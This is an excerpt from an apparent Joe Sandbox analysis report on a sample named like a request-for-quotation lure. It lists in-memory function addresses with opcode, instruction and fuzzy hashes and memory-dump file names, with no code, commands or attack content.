                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aff78c7bc4815131f6fd999466f5b97af517f312f7cd1088becdaf875438b705
                                                                                            • Instruction ID: 476c78324e2b97d4b88db345f94fd79009e2377ed0e764dd9c1f3eb1b57abff1
                                                                                            • Opcode Fuzzy Hash: aff78c7bc4815131f6fd999466f5b97af517f312f7cd1088becdaf875438b705
                                                                                            • Instruction Fuzzy Hash: 7151E572A0D7D50FD31AA7785C550A17FA1DB87220B0982FBD4C6CB1A7E519AC0B83A1
                                                                                            Function 00007FF848F01602 Relevance: .2, Instructions: 189COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8851ee4b4660f045b2650a42f2a8d503d22cacb0d10dee31a3b6978e874682ac
                                                                                            • Instruction ID: 6bc0859db133573e05c3743effb8e7ba14e6b5593d99e947eada817502887485
                                                                                            • Opcode Fuzzy Hash: 8851ee4b4660f045b2650a42f2a8d503d22cacb0d10dee31a3b6978e874682ac
                                                                                            • Instruction Fuzzy Hash: 46512631E1C9465FE399FB2858565B973E1FFA1390F04017AE41EC31C7FE1C68468286
                                                                                            Function 00007FF848F12465 Relevance: .2, Instructions: 189COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f36007ff54d4694704023927d56867a5e503d66671d3c2915a4033a8f68cf787
                                                                                            • Instruction ID: f7c7136b6a1f72450062fe0728d7cdefa4c37a66137904a5274ebc1e970b7c80
                                                                                            • Opcode Fuzzy Hash: f36007ff54d4694704023927d56867a5e503d66671d3c2915a4033a8f68cf787
                                                                                            • Instruction Fuzzy Hash: 7951B33190DA5D8FDB85EF68C464AA97BF1FF6A341F0900AAD009D72E2CB35AC40C791
                                                                                            Function 00007FF848F020DD Relevance: .2, Instructions: 177COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 59dd7c465de83843d55ceb5bef88d82d81eea59f1386c146ad390b473497a6e9
                                                                                            • Instruction ID: 50201765efa19fb6d193fbd5c37f22f7cef8b105ce235513ed84898f6af795c6
                                                                                            • Opcode Fuzzy Hash: 59dd7c465de83843d55ceb5bef88d82d81eea59f1386c146ad390b473497a6e9
                                                                                            • Instruction Fuzzy Hash: A451F831A0E9199FEB49FB6888556B977E1FF9A381F0401BAD00DC72D2DF38A8458751
                                                                                            Function 00007FF848F02100 Relevance: .2, Instructions: 163COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 55bb1e1d2c94f38378b9de2626d949024aa3e6a51eb036852786f135d86c86ae
                                                                                            • Instruction ID: dd76f5b76b1a3baf2788bfcc7875e647bd8f89f24ffe2adaac9d781f64253cde
                                                                                            • Opcode Fuzzy Hash: 55bb1e1d2c94f38378b9de2626d949024aa3e6a51eb036852786f135d86c86ae
                                                                                            • Instruction Fuzzy Hash: 9941E731B0D91A9FEB89FB6888556B977E2FF9A381F000179D00DC72D6DF38A8458751
                                                                                            Function 00007FF848F07730 Relevance: .2, Instructions: 162COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0944a8d14a211035b1823a3ef6781d5be17099be1704b4bc702bf9c36eabdbfe
                                                                                            • Instruction ID: f3e049424ed0abb6e2d6e25254a07d1370e7053ffe5ed3e9cc832ca30f66e974
                                                                                            • Opcode Fuzzy Hash: 0944a8d14a211035b1823a3ef6781d5be17099be1704b4bc702bf9c36eabdbfe
                                                                                            • Instruction Fuzzy Hash: 6B419E31D0DA4D9FEB58EF18D855AF97BE1FF5A340F04016AE40AC7292DF28AC458B45
                                                                                            Function 00007FF848F07820 Relevance: .2, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d437721e53918312b9de8f3ba6c738e258f11e0a28f5e118062d6881f67cda04
                                                                                            • Instruction ID: 19b4e18752ac95b445df0ec2ef6ab1f1a4011ed092948d7d0005f581274457dd
                                                                                            • Opcode Fuzzy Hash: d437721e53918312b9de8f3ba6c738e258f11e0a28f5e118062d6881f67cda04
                                                                                            • Instruction Fuzzy Hash: A7414C31A0991D8FDF84EF58C464AA97BF1FF6D351F1501AAD40AD72A1CB35AD80CB90
                                                                                            Function 00007FF848F02E78 Relevance: .1, Instructions: 144COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f240454117bb4dd2c73286bdf4eb775edea2be8d576696c8c2bd3ae004afb1f0
                                                                                            • Instruction ID: 0a3469bb6b43ab89fbb801d856fba91d7cabf74153757bba463e160afc0f3269
                                                                                            • Opcode Fuzzy Hash: f240454117bb4dd2c73286bdf4eb775edea2be8d576696c8c2bd3ae004afb1f0
                                                                                            • Instruction Fuzzy Hash: 2C41F031E2DA1A8FE798AB6894652FDBBF1EF45390F8401BAD009C32D2DF285C049B54
                                                                                            Function 00007FF848F0ABD9 Relevance: .1, Instructions: 139COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 80eff078d7c7e5da5ffe64c32cbde96107ae4517c98970113d6f8bde265f5488
                                                                                            • Instruction ID: 6fa99c2335d64fee6ec34d1a3dc14ed83209c99d3e2769b0067fdb0b20b897c8
                                                                                            • Opcode Fuzzy Hash: 80eff078d7c7e5da5ffe64c32cbde96107ae4517c98970113d6f8bde265f5488
                                                                                            • Instruction Fuzzy Hash: C941B470A0CB4A4FD758DB188455579B7E2FBD6301F14867ED0CAC32E5EB34E8818786
                                                                                            Function 00007FF848F02E58 Relevance: .1, Instructions: 137COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8a1110624b7794e8b508c8b9d13d963f524956fd129a1ecab397396b26a3c334
                                                                                            • Instruction ID: c14da5ac6ae4a3d6e7f30331028eac8c0bc87cfe33f5915dd5894be81fe3c0c5
                                                                                            • Opcode Fuzzy Hash: 8a1110624b7794e8b508c8b9d13d963f524956fd129a1ecab397396b26a3c334
                                                                                            • Instruction Fuzzy Hash: 3F41133050CA954FE74AAB2888255797BE0FF87345B0805FED4CACB2E3EA2CD645C741
                                                                                            Function 00007FF848F024A9 Relevance: .1, Instructions: 130COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4b432f4b196fd1b7ecdfeb0005e20ff7f31cb69b329d370235fcb1f9bcc38c19
                                                                                            • Instruction ID: 8a0f543806ac679d2eed815b4bf8172d547c75066fa99fa1c27a1c6a56369383
                                                                                            • Opcode Fuzzy Hash: 4b432f4b196fd1b7ecdfeb0005e20ff7f31cb69b329d370235fcb1f9bcc38c19
                                                                                            • Instruction Fuzzy Hash: 17414831A0D68A4FE79AB76898A53B93BE0EF46750F0400BBD089C71D3EF2C58858756
                                                                                            Function 00007FF848F07818 Relevance: .1, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a5d29f2318cd4f8343cf47a51401478e0e7940f328898e34c3ee89781c725425
                                                                                            • Instruction ID: 4d3689f446bcaa300863bcc0305851379619e09551547d3e8df089ff4a9b563d
                                                                                            • Opcode Fuzzy Hash: a5d29f2318cd4f8343cf47a51401478e0e7940f328898e34c3ee89781c725425
                                                                                            • Instruction Fuzzy Hash: 17416F30A09A1E8FDB94EF2CD4546B97BF0FF5A341F1505AAD409D72A1DB35AD40CB80
                                                                                            Function 00007FF848F134AC Relevance: .1, Instructions: 127COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 171eedcd4bdee0aee1e92a8794de6607f824639efeda9d7be20853ea5f10006f
                                                                                            • Instruction ID: d3f97fe3128847a701b7c6e69810f2c972c01ce8c7a81d863bc4b1a0a5439076
                                                                                            • Opcode Fuzzy Hash: 171eedcd4bdee0aee1e92a8794de6607f824639efeda9d7be20853ea5f10006f
                                                                                            • Instruction Fuzzy Hash: 5441D53164D7C64FD30BA73888641A5BFA2EB83360F1942EBC085CB1E7DA2C5D49C756
                                                                                            Function 00007FF848F0E81E Relevance: .1, Instructions: 126COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 98dd5edf8e4d0f47dc88c5794db764695366d4e625f269a93a06cd0f4f724bfe
                                                                                            • Instruction ID: c62c8306f9960ab9bcb5b45b7a25564e31152937be9396687902be31af7db6e2
                                                                                            • Opcode Fuzzy Hash: 98dd5edf8e4d0f47dc88c5794db764695366d4e625f269a93a06cd0f4f724bfe
                                                                                            • Instruction Fuzzy Hash: BA319C31A0DD0A8FDB58EB08D451AE9BBE1EF69340B14416AD40EC3292DF38ED468B85
                                                                                            Function 00007FF848F00E4D Relevance: .1, Instructions: 123COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d0abebba29951e6b2eca332708959c1d0a7eeb2626ecc54ad44c48b9f2872c65
                                                                                            • Instruction ID: bc08646ceab7b76dcadf14ed952bfa74fdbca70de088fcea02697308af0f4a49
                                                                                            • Opcode Fuzzy Hash: d0abebba29951e6b2eca332708959c1d0a7eeb2626ecc54ad44c48b9f2872c65
                                                                                            • Instruction Fuzzy Hash: 0731E431E0DA8A4FEB85FB2898126E97BE1EF86344F0401B6E44CD72D3DE285805C355
                                                                                            Function 00007FF848FD1210 Relevance: .1, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2328380573.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848fd0000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4416037f2b0e0d7b79f02f1d2d934fbc825dc205a20741562b2a0845f8c1143d
                                                                                            • Instruction ID: d8d2cf602ddb4dfc5d16e78a23a9da00ca07a45ebf13b762fc54611276e1fc2d
                                                                                            • Opcode Fuzzy Hash: 4416037f2b0e0d7b79f02f1d2d934fbc825dc205a20741562b2a0845f8c1143d
                                                                                            • Instruction Fuzzy Hash: D031DF3290CA4E8FEB59EF28D8955B8B7E1FB54341F1402BAD10BD75D5EF21A881CB84
                                                                                            Function 00007FF848F01860 Relevance: .1, Instructions: 118COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 530be7d4003c708c8f783a514f3895061b52b53631dfe8d7581f2288bd4f2785
                                                                                            • Instruction ID: 300646ea95dce3250d415c0847190959df98f96d9c3ec3339e0f990353cb9a86
                                                                                            • Opcode Fuzzy Hash: 530be7d4003c708c8f783a514f3895061b52b53631dfe8d7581f2288bd4f2785
                                                                                            • Instruction Fuzzy Hash: D631B03091CB098FD768EF28C8556BAB7F1FF58341F004A3ED44AD3691DB75A9808B82
                                                                                            Function 00007FF848F0AB98 Relevance: .1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: da00c4d1dfdf36144b99c2046d44f113c8a30b78a382089e58f953586295b874
                                                                                            • Instruction ID: 64df4bd50f925218e2cbbf28f9598d5a6bfccd5db515f8c66aed3af26fc9a743
                                                                                            • Opcode Fuzzy Hash: da00c4d1dfdf36144b99c2046d44f113c8a30b78a382089e58f953586295b874
                                                                                            • Instruction Fuzzy Hash: 0631B33060CB894FD308DB1C8455465BBE2FBE6311F148A7ED4DAC32E5EA34E885C785
                                                                                            Function 00007FF848F0115D Relevance: .1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 00c58747f803a59f6f7fa35ae964ea4b93857e0368408b2a056e06682915fca8
                                                                                            • Instruction ID: 19b9c227d2f9523436c8680f0c2aab9383b0171a48d307929d909214d5a91a6a
                                                                                            • Opcode Fuzzy Hash: 00c58747f803a59f6f7fa35ae964ea4b93857e0368408b2a056e06682915fca8
                                                                                            • Instruction Fuzzy Hash: 4821F832E1C9594EE72DAB5C68415BCB7D5FF867A1F24017AD0CEC31C6FE14A8834689
                                                                                            Function 00007FF848F00E70 Relevance: .1, Instructions: 108COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d9c6b8c6e9d67ad21fd9fd812f69b68cb2ed021f8ec94c6d7496a7eecd0b9820
                                                                                            • Instruction ID: e28c45cc0b3d0e21387f7525463faf1123e3a81f5f8d60bef36069e2b9cc5a23
                                                                                            • Opcode Fuzzy Hash: d9c6b8c6e9d67ad21fd9fd812f69b68cb2ed021f8ec94c6d7496a7eecd0b9820
                                                                                            • Instruction Fuzzy Hash: B5319271E1C94A8FEB84EB2CD8526E97BA2EF9A348F0405B6E40DD72C6DF2858018345
                                                                                            Function 00007FF848F0A714 Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b90e9a193d7a61bbe27bc4a4bf0f082a05277ad86c7c00b6507b5bcac28c77d4
                                                                                            • Instruction ID: 0eaed59465bcacda95a11839566ab42cea981e72310e2636fefe84bdcae95748
                                                                                            • Opcode Fuzzy Hash: b90e9a193d7a61bbe27bc4a4bf0f082a05277ad86c7c00b6507b5bcac28c77d4
                                                                                            • Instruction Fuzzy Hash: 3931D331A1C7854FD319DB188891465BBE2FFC6341F14897DD4D6C32E6DB38A582CB86
                                                                                            Function 00007FF848F0D0FA Relevance: .1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbd8e8a18e8f0bdc9798b0d49b7903a77cfb9da35e6e579540a8d909dbf7a119
                                                                                            • Instruction ID: cb94792e685ef86ec1aa1bc6d1712affbd7f32ad51b160dd4143eda56125275c
                                                                                            • Opcode Fuzzy Hash: fbd8e8a18e8f0bdc9798b0d49b7903a77cfb9da35e6e579540a8d909dbf7a119
                                                                                            • Instruction Fuzzy Hash: 4621ED31B1E90A9FF388FB2D685837466D2FFA9652F0402BAE40CC72D6DE185C458355
                                                                                            Function 00007FF848F07D00 Relevance: .1, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 751cb2e81f176f49e50257a46f786393a497f9adfcd9a534e187e3a336b2d7b9
                                                                                            • Instruction ID: 1b917afeae7df5b35628e93f44c9c7ce9856ee97abc29ed9a25908c7cbf8b171
                                                                                            • Opcode Fuzzy Hash: 751cb2e81f176f49e50257a46f786393a497f9adfcd9a534e187e3a336b2d7b9
                                                                                            • Instruction Fuzzy Hash: A4210030B1E90AAFF388FB2D685877566D1FF99652F0402BAE40CC72D2DE185C458355
                                                                                            Function 00007FF848F01F10 Relevance: .1, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a1995fee7c5029090c251467ee4f316c01173700dc84e4f8372c526b1fb905b
                                                                                            • Instruction ID: a83f8ab64647db8b3026a2923929f226454ea406bc286078ae15a4721f512e34
                                                                                            • Opcode Fuzzy Hash: 7a1995fee7c5029090c251467ee4f316c01173700dc84e4f8372c526b1fb905b
                                                                                            • Instruction Fuzzy Hash: E821E97391F1856EE74177B878422DA7B74FF42378F480277D09C8E493DA1C285A83A9
                                                                                            Function 00007FF848F06459 Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4876a11ba0d01b763bfbbb3c7ec69bb015ec6d2a9a60747324b60e6e9b8b22a0
                                                                                            • Instruction ID: b6c246433f55e189f1abb903fb9d5d178d2f0f1afcad130f15caf2d8e871c849
                                                                                            • Opcode Fuzzy Hash: 4876a11ba0d01b763bfbbb3c7ec69bb015ec6d2a9a60747324b60e6e9b8b22a0
                                                                                            • Instruction Fuzzy Hash: A121023190C6964FE346A72458151F93BD1EF87369F0801BAE488DB1D2EB2CD686C356
                                                                                            Function 00007FF848F0A754 Relevance: .1, Instructions: 91COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b415276e22f71329bba86f1f95e4088d480bb71311bd0f8c03e4046a0f4a42a0
                                                                                            • Instruction ID: 43f4b8dfc8b7f1d8424995c8dade82b303573391256f0f55a6ddb1866bd98cef
                                                                                            • Opcode Fuzzy Hash: b415276e22f71329bba86f1f95e4088d480bb71311bd0f8c03e4046a0f4a42a0
                                                                                            • Instruction Fuzzy Hash: 2631B13061C7854FD30CDB19C891465B7E2FBCA201F148A7EE4D6C32A5DB38E552CB82
                                                                                            Function 00007FF848F03945 Relevance: .1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3c5361139360beedd3eb5a1a8b9763a662209a5055085b7b33bea6e24cc2b91e
                                                                                            • Instruction ID: ec2c9f73780df11ae5d9deb4393b3062a9c394fba4f63f368a68acca81e058a2
                                                                                            • Opcode Fuzzy Hash: 3c5361139360beedd3eb5a1a8b9763a662209a5055085b7b33bea6e24cc2b91e
                                                                                            • Instruction Fuzzy Hash: 46210831A0DB884FD381EB2C54541A57FE1EFDA261B0802BBE488C7293DA249985C743
                                                                                            Function 00007FF848F123B9 Relevance: .1, Instructions: 81COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 266bed6e6ce9bae6ca21bc9b2ec2c0dd02e53dfc752cd1f346c9d553640366ba
                                                                                            • Instruction ID: cd569ec3029fa1070f6939e795643b0fe8db934ea79cbecd722fe181307eef1f
                                                                                            • Opcode Fuzzy Hash: 266bed6e6ce9bae6ca21bc9b2ec2c0dd02e53dfc752cd1f346c9d553640366ba
                                                                                            • Instruction Fuzzy Hash: 8B21D13190CA494FE340FB6894482B9BBD0FF98350F1805BAD48CD71E3EF29A982C749
                                                                                            Function 00007FF848F02E50 Relevance: .1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
